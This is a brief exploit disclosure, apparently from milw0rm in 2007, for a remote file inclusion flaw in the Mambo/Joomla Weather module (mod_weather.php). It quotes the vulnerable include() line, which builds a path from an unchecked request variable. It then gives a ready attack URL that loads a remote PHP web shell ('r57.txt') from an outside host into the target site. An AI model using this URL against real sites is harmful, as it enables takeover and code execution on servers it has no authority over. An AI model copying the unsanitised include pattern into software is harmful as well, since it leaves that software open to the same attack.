============================================================
Mambo/Joomla Module Weather (absolute_path) Remote File include Vuln

Found By : Cold z3ro , [email protected]

Homepage: www.Hack-Teach.com

Script :
http://www.joomlaos.de/option,com_remository/Itemid,41/func,download/id,47/chk,a39037e15bb5cd125f3cfd9dccaec6f5/no_html,1.html

File : /mod_weather.php
include($absolute_path.'/language/'.$lang.'/lang_mod_weather.php');

http://site/{path}/modules/mod_weather.php?absolute_path=http://nachrichtenmann.de/r57.txt?

#Long Life Palestine
#www.Hack-Teach.com

milw0rm.com [2007-04-11]